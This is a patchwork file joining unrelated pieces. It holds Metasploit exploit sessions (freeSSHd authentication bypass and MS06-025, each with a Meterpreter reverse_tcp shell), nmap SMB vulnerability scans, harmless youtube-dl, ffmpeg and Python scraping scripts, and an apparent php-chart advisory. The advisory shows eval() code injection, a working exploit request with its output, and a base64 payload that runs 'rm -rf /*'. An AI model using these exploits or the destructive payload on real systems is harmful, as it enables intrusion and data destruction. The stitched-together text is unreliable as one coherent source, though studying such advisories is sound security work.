# msfconsole walkthrough against a lab host; both addresses are private
# (RFC 1918) ones: 192.168.178.22 is the target, 192.168.178.26 the operator.
#
# Step 1: banner check, reports the SSH server software and version on the target.
use auxiliary/scanner/ssh/ssh_version
set RHOSTS 192.168.178.22
run
# Step 2: the freeSSHd authentication-bypass module with a Meterpreter payload.
use exploit/windows/ssh/freesshd_authbypass
set RHOST 192.168.178.22
# reverse_tcp makes the target open the connection back to LHOST, so on the
# defended side it shows up as an outbound TCP session from the SSH server.
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.26
exploit
# Session commands: print the account the session runs as and basic host details.
getuid
sysinfo
nmap --script smb-check-vulns.nse -p445 <host>
sudo nmap -sU -sS --script smb-check-vulns.nse -p U:137,T:139 <host>

Script Output

Host script results:
| smb-check-vulns:
|   MS08-067: VULNERABLE
|   regsvc DoS: regsvc DoS: VULNERABLE
|   SMBv2 DoS (CVE-2009-3103): VULNERABLE
|   MS06-025: NO SERVICE (the Ras RPC service is inactive)
|_  MS07-029: NO SERVICE (the Dns Server RPC service is inactive)

$ msfconsole
## ### ## ## ## ## #### ###### #### ##### ##### ## #### ###### ####### ## ## ## ## ## ## ## ## ## ## ### ## ####### ###### ## ##### #### ## ## ## ## ## ## ## ## # ## ## ## ## ## ## ##### ## ## ## ## ## ## ## #### ### ##### ##### ## #### #### #### ### ##
msf > use exploit/windows/smb/ms06_025_rras
msf exploit(ms06_025_rras) > show payloads
msf exploit(ms06_025_rras) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(ms06_025_rras) > set LHOST [MY IP ADDRESS]
msf exploit(ms06_025_rras) > set RHOST [TARGET IP]
msf exploit(ms06_025_rras) > show targets
msf exploit(ms06_025_rras) > set TARGET [TARGET ID]
msf exploit(ms06_025_rras) > ex
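#!/bin/bash
# Download a video with youtube-dl and convert it to "<artist> - <song>.mp3"
# in the current directory.
#
# The URL, artist and song name are typed in by the user, so they are handled
# as data only: every expansion is quoted, the file names are prefixed with
# "./" so a leading "-" is never parsed as an option, and "/" is replaced so
# the names cannot point outside the current directory.

echo "Enter the youtube url to begin downloading the video."
read -r VIDEO
echo "What is the artist of the song?"
read -r ARTIST
echo "What is the name of the song?"
read -r NAME

# Common stem of the intermediate .flv and the final .mp3.
base="./${ARTIST//\//_} - ${NAME//\//_}"

# youtube-dl treats the -o value as an output template, so a literal "%" has
# to be doubled. "--" ends option parsing before the user-supplied URL.
if ! youtube-dl -o "${base//%/%%}.flv" -- "$VIDEO"; then
  echo "Download failed." >&2
  exit 1
fi

# NOTE(review): newer ffmpeg builds read "-ab 128" as 128 bit/s, not 128 kbit/s;
# "128k" is probably what was meant. Confirm against the installed ffmpeg.
if ! ffmpeg -i "${base}.flv" -acodec libmp3lame -ac 2 -ab 128 -vn -y "${base}.mp3"; then
  # Keep the download so a failed conversion does not throw the video away.
  echo "Conversion failed; keeping ${base}.flv" >&2
  exit 1
fi

# Only a single regular file is removed, so -r is not needed.
rm -f -- "${base}.flv"
echo "Your video is finally converted into a mp3!"
##CHEERS! ;)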
# In an Ubuntu Linux terminal, type:
$ apt-get update && apt-get install youtube-dl -y
$ ./youtube-dl -cit "[YouTube playlist URL, without the square brackets]"
# Enjoy ;)
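#!/bin/bash
# Re-encode every .avi file in the current directory at a 200k bitrate so the
# result is small enough to watch a movie / drama on a mobile device.
# Each output is written next to its input as "<name>.avi.mpg".

# Without nullglob an unmatched pattern would be passed to ffmpeg literally.
shopt -s nullglob

# Glob instead of parsing ls: names with spaces stay in one piece, and the
# "./" prefix keeps a name starting with "-" from being read as an option.
for i in ./*.avi; do
  printf 'item: %s\n' "${i#./}"
  ffmpeg -i "$i" -b 200k "$i.mpg"
done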
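#! /usr/bin/python
# Download the timetable for one intake code from webspace.apiit.edu.my and
# save it as schedule<week>.html in the current directory.
#
# Python 2 script. Install mechanize and BeautifulSoup before running it.
#
# NOTE(review): both pages are fetched over plain HTTP and the scraped markup
# is written unchanged into a local HTML file, so anything on the network path
# can alter what ends up in that file. Switch the URLs to https if the site
# offers it.
import cookielib
import re
import sys
import urllib
import urllib2

import mechanize
from BeautifulSoup import BeautifulSoup

TIMETABLE_URL = 'http://webspace.apiit.edu.my/intake-timetable/'
RESULT_URL = 'http://webspace.apiit.edu.my/intake-timetable/intake-result.php'
USER_AGENT = ('Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) '
              'Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')

var = raw_input("Enter Your Intake Code: ")

# Step 1: read the landing page and pick the first "<digits-and-hyphens>.xml"
# name it mentions; that name is the "week" value the result form expects.
br = mechanize.Browser()
getweb = br.open(TIMETABLE_URL).read()
getwebspace = BeautifulSoup(getweb)
# The dot is escaped so only a literal ".xml" suffix matches. The stripped
# value goes into a local file name below, so it must stay digits and hyphens.
scrapDate = re.compile(r'[0-9-]+\.xml')
listdate = re.findall(scrapDate, str(getwebspace))
if not listdate:
    sys.exit('No week file found on the timetable page.')
week = listdate[0]
date = week.replace(".xml", "")

intake_Search_Week = ''
selectIntakeAll = var

# Step 2: open the landing page with a cookie-aware opener, then post the
# form values to the result page.
cj = cookielib.CookieJar()
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
opener.addheaders = [('User-agent', USER_AGENT)]
opener.open(TIMETABLE_URL)
post_data = urllib.urlencode({
    'week': week,
    'intake_Search_Week': intake_Search_Week,
    'selectIntakeAll': selectIntakeAll,
})
log = opener.open(RESULT_URL, post_data)
logread = log.read()

# Step 3: cut the timetable table(s) out of the response.
# NOTE(review): the character class is kept as written; "A-z" and ",-:" are
# ranges that also cover punctuation. Confirm that this is intended.
webspace = BeautifulSoup(logread)
scrapSchedule = re.compile(
    r'<table class="timetable-display">\s*[A-z 0-9 \<\>,-:]+</table>')
listwebspace = re.findall(scrapSchedule, str(webspace))
if not listwebspace:
    sys.exit('No timetable found for intake code %s.' % var)

# Join the matches into HTML. The original formatted the list itself, which
# wrote its repr (brackets, quotes, escapes), and its replace() result was
# discarded.
htmlcode = ''.join(listwebspace)

# "with" closes the file; the original "f.close" lacked the call parentheses.
with open('schedule%s.html' % date, 'w') as f:
    f.write(htmlcode)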
===============================================================
Vulnerable Software: php-chart_v1.0
Official Site: http://php-charts.com/
Vuln: PHP Code Execution.
===============================================================
Tested On: Debian squeeze 6.0.6
Server version: Apache/2.2.16 (Debian)
PHP 5.3.3-7+squeeze14 with Suhosin-Patch (cli) (built: Aug 6 2012 20:08:59)
Copyright (c) 1997-2009 The PHP Group
Zend Engine v2.3.0, Copyright (c) 1998-2010 Zend Technologies
with Suhosin v0.9.32.1, Copyright (c) 2007-2010, by SektionEins GmbH
================================================================
About Software:
Php-Charts is basically a class which can be used to generate
different charts (Bar, Pie, Doughnut etc.) in different formats (PDF, PNG, JPG, HTML)
using different data sources (csv, xml, MySQL, MS Sql, MS Access, PostgreSql,
user defined data).
================================================================
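About vuln: wizard/url.php copies every GET parameter name and value into a string of PHP code and runs it with eval(), without validating either one, so a crafted query string is executed as PHP on the server. The file as shipped: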
root@debian:/etc/apache2/htdocs/hacker1/wp/chart/chart/wizard# cat url.php
<?php
// wizard/url.php: builds a PHPChart from the query string and renders it.
// Every non-empty GET parameter becomes a property assignment on $chart by
// concatenating the parameter name and value into PHP source and eval()'ing it.
// Neither $key nor $value is validated or escaped, so the request decides what
// code eval() runs. That is the code-execution issue this advisory reports.
// Fix direction: drop eval(), check $key against an allow-list of chart
// property names, and assign the typed value directly ($chart->$key = ...).
require("../lib/phpchart.class.php");
// The only parameter names that get a "#" prefix on their value.
$color_var=array("txt_col","line_col","bg_color");
// "type" is read without isset(); a request without it raises an
// "Undefined index" notice.
$cname=$_GET["type"];
$chart=new PHPChart($cname);
foreach($_GET as $key=>$value)
{
if($value!="")
{
if(in_array($key,$color_var))
// $key is one of three fixed names here, but $value is still spliced,
// unescaped, into a double-quoted PHP string inside the eval'd code.
eval('$chart->'.$key.'="#'.$value.'";');
else if($value=='yes')
// $value is constant in this branch; $key is raw request text placed in code.
eval('$chart->'.$key.'=true;');
else if($value=='no')
// Same as the 'yes' branch: $key is unvalidated.
eval('$chart->'.$key.'=false;');
else if(is_numeric($value))
// $value is numeric here; $key is still unvalidated.
eval('$chart->'.$key.'='.$value.';');
else
// Both $key and $value are raw request data in this branch.
eval('$chart->'.$key."='".$value."';");
}
}
$chart->genChart();
Exploitation:
root@debian:/tmp# wget 'http://hacker1.own//wp/chart/chart/wizard/url.php?${var_dump($_SERVER)}=IZABEKAILOVEYOUBABY' -O out.txt && cat out.txt
--2013-01-15 21:19:16-- http://hacker1.own//wp/chart/chart/wizard/url.php?$%7Bvar_dump($_SERVER)%7D=IZABEKAILOVEYOUBABY
Resolving hacker1.own... 127.0.0.1
Connecting to hacker1.own|127.0.0.1|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/html]
Saving to: “out.txt”
[ <=> ] 1,917 --.-K/s in 0s
2013-01-15 21:19:17 (8.56 MB/s) - “out.txt” saved [1917]
Notice: Undefined index: type in /etc/apache2/htdocs/hacker1/wp/chart/chart/wizard/url.php on line 4
array(28) {
["DOCUMENT_ROOT"]=>
string(28) "/etc/apache2/htdocs/hacker1/"
["GATEWAY_INTERFACE"]=>
string(7) "CGI/1.1"
["HTTP_ACCEPT"]=>
string(3) "*/*"
["HTTP_CLIENT_IP"]=>
string(9) "127.0.0.1"
["HTTP_HOST"]=>
string(11) "hacker1.own"
["HTTP_USER_AGENT"]=>
string(21) "Wget/1.12 (linux-gnu)"
["HTTP_VIA"]=>
string(77) "http/1.0 debian[FE800000000000000A0027FFFE077FC6] (ApacheTrafficServer/3.2.0)"
["HTTP_X_FORWARDED_FOR"]=>
string(9) "127.0.0.1"
["PATH"]=>
string(4) "/bin"
["PHPRC"]=>
string(14) "/etc/php5/cgi/"
["QUERY_STRING"]=>
string(45) "$%7Bvar_dump($_SERVER)%7D=IZABEKAILOVEYOUBABY"
["REDIRECT_STATUS"]=>
string(3) "200"
["REMOTE_ADDR"]=>
string(9) "127.0.0.1"
["REMOTE_PORT"]=>
string(5) "60830"
["REQUEST_METHOD"]=>
string(3) "GET"
["REQUEST_URI"]=>
string(76) "/wp/chart/chart/wizard/url.php?$%7Bvar_dump($_SERVER)%7D=IZABEKAILOVEYOUBABY"
["SCRIPT_FILENAME"]=>
string(57) "/etc/apache2/htdocs/hacker1/wp/chart/chart/wizard/url.php"
["SCRIPT_NAME"]=>
string(30) "/wp/chart/chart/wizard/url.php"
["SERVER_ADDR"]=>
string(9) "127.0.0.1"
["SERVER_ADMIN"]=>
string(21) "webmaster@hacker1.own"
["SERVER_NAME"]=>
string(11) "hacker1.own"
["SERVER_PORT"]=>
string(2) "80"
["SERVER_PROTOCOL"]=>
string(8) "HTTP/1.1"
["SERVER_SIGNATURE"]=>
string(0) ""
["SERVER_SOFTWARE"]=>
string(6) "Apache"
["UNIQUE_ID"]=>
string(24) "UPYOJH8AAQEAAE8eNfMAAAAC"
["PHP_SELF"]=>
string(30) "/wp/chart/chart/wizard/url.php"
["REQUEST_TIME"]=>
int(1358302756)
}
Notice: Undefined variable: in /etc/apache2/htdocs/hacker1/wp/chart/chart/wizard/url.php(20) : eval()'d code on line 1
Fatal error: Cannot access empty property in /etc/apache2/htdocs/hacker1/wp/chart/chart/wizard/url.php(20) : eval()'d code on line 1
root@debian:/tmp#
Example 2 (the base64 string decodes to `rm -rf /*`, which system() hands to the server's shell):
http://hacker1.own//wp/chart/chart/wizard/url.php?&123&${var_dump(system(base64_decode(cm0gLXJmIC8q)))}=123456LoL
=====================ENDS HERE============================